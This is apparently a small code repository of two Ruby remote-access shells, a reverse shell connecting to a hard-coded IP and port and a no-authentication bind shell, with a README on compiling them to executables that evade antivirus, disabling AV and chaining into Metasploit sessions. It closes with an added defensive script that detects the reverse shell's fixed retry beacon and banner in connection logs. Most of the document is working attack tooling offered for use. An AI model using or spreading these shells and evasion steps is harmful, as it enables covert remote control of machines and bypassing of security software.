├── revshell.rb
├── shell.rb
└── README.md

/revshell.rb:
```ruby
#!/usr/bin/env ruby

require 'socket'
require 'open3'

# Set the Remote Host IP
RHOST = "192.168.1.10"
# Set the Remote Host Port
PORT = "6667"

# Tries to connect every 20 sec until it connects.
begin
  sock = TCPSocket.new "#{RHOST}", "#{PORT}"
  sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

# Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do |stdin, stdout_and_stderr|
      IO.copy_stream(stdout_and_stderr, sock)
    end
  end
rescue
  retry
end
```

/shell.rb:
```ruby
#!/usr/bin/env ruby

require 'socket'
require 'open3'

# The number passed to tcp_server_loop is the port number the shell listens on.
Socket.tcp_server_loop(5555) do |sock, client_addrinfo|
  begin
    while command = sock.gets
      Open3.popen2e("#{command}") do |stdin, stdout_and_stderr|
        IO.copy_stream(stdout_and_stderr, sock)
      end
    end
  rescue
    break if command =~ /IQuit!/
    sock.write "Command or file not found.\n"
    sock.write "Type IQuit! to kill the shell forever on the server.\n"
    sock.write "Use ^] or ctl+C (telnet or nc) to exit and keep it open.\n"
    retry
  ensure
    sock.close
  end
end
```

/README.md:
# Ruby-Shells

These are very simple shells, normal and reverse, I wrote in Ruby to help in pen testing. Simply put, you can use them to get a working shell on a box that won't be killed by AV, use it to kill AV, then use it to upgrade to a meterpreter session or whatever you like. You can compile them to an executable file to run on systems with no Ruby.

## revshell.rb
This is a classic reverse shell. First change the IP and port to what you want them to be. Test it and, if all is working, set up your attacking box to accept the connections. Then on a Windows box with Ruby and the ocra gem installed run this command:

    ocra --verbose revshell.rb

Let it connect to your attacking box. Then exit the connection, which will finish the script and allow it to be compiled. Now you have a simple reverse shell .exe file that AV won't think twice about.

You can use exploit/multi/handler with the generic/shell_reverse_tcp payload to let a ton of these connect back to you.

## shell.rb
This is a normal shell; it is a basic no-auth telnet server on the port you pick, kinda. Once you connect to it, to kill it on the server type IQuit!; otherwise it will stay open as long as you like.

Bug: The exit command works fine on everything other than Windows, I don't know why. In Windows to kill it you have to kill the process or it will stay until reboot.

To compile it to an exe using ocra use the command:

    ocra --verbose --no-dep-run --add-all-core shell.rb

Since I didn't figure out a way to give it an exit command on Windows you have to use --no-dep-run or the compile will hang forever. The --add-all-core makes the file HUGE, which is no good. I have not put the effort into figuring out what it really needs since I normally use the reverse shell; if someone else figures out a better way let me know.

### Limitations
The change directory command doesn't work. So this:

    cd /etc
    ls

doesn't work. However, this:

    ls /etc/

does.

Also wildcards don't work. So this:

    ls /etc/*.conf

doesn't work.

Stay in the shell and don't try to go into another program. If you vi a file, say, it will run and show you the file, but you will never get out of vi and you have lost your shell.
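As an added example that is not part of this repo, here is the defender-side view of revshell.rb: its connect-back loop retries at a fixed 20-second interval until the listener answers and then always sends the same banner as its first bytes, both of which are easy to flag in connection logs. The log line format and the sample lines are constructed for this example.

```ruby
# Added example (not part of the Ruby-Shells repo): a small detector for the
# revshell.rb connect-back pattern: a fixed 20 s retry, then a constant banner.
require 'time'

# Constructed sample, one outbound TCP attempt per line, as a firewall or EDR
# might record it: "<ISO time> <src> <dst>:<port> <OK|FAIL> [<first bytes>]"
SAMPLE_LOG = <<~LOG
  2024-05-01T10:00:00Z 10.0.0.5 192.168.1.10:6667 FAIL
  2024-05-01T10:00:20Z 10.0.0.5 192.168.1.10:6667 FAIL
  2024-05-01T10:00:40Z 10.0.0.5 192.168.1.10:6667 FAIL
  2024-05-01T10:01:00Z 10.0.0.5 192.168.1.10:6667 OK "We are connected!"
  2024-05-01T10:00:03Z 10.0.0.7 10.0.0.20:443 OK
  2024-05-01T10:00:31Z 10.0.0.7 10.0.0.20:443 OK
  2024-05-01T10:02:12Z 10.0.0.7 10.0.0.20:443 OK
LOG

LINE = /\A(\S+) (\S+) (\S+):(\d+) (OK|FAIL)(?: "(.*)")?\z/

def parse_log(text)
  text.each_line.filter_map do |l|
    m = LINE.match(l.strip) or next
    { time: Time.iso8601(m[1]), src: m[2], dst: m[3], port: m[4].to_i,
      ok: m[5] == 'OK', banner: m[6] }
  end
end

# Flag a (src, dst, port) flow when either the first payload bytes are the
# fixed banner revshell.rb sends, or there are >= min_attempts attempts whose
# gaps all agree within `tolerance` seconds (the `sleep 20; retry` loop).
def find_beacons(text, min_attempts: 3, tolerance: 2)
  parse_log(text).group_by { |e| [e[:src], e[:dst], e[:port]] }.filter_map do |key, events|
    events = events.sort_by { |e| e[:time] }
    banner = events.any? { |e| e[:banner] == 'We are connected!' }
    gaps = events.each_cons(2).map { |a, b| b[:time] - a[:time] }
    periodic = gaps.size >= min_attempts - 1 && (gaps.max - gaps.min) <= tolerance
    next unless banner || periodic
    { src: key[0], dst: key[1], port: key[2], attempts: events.size,
      period: periodic ? gaps.sum / gaps.size : nil, banner: banner }
  end
end

if __FILE__ == $0
  find_beacons(SAMPLE_LOG).each { |b| puts b.inspect }
end
```

The periodic check on its own catches the retry loop even when the listener never answers, so the banner is only a confirming signal, not a requirement.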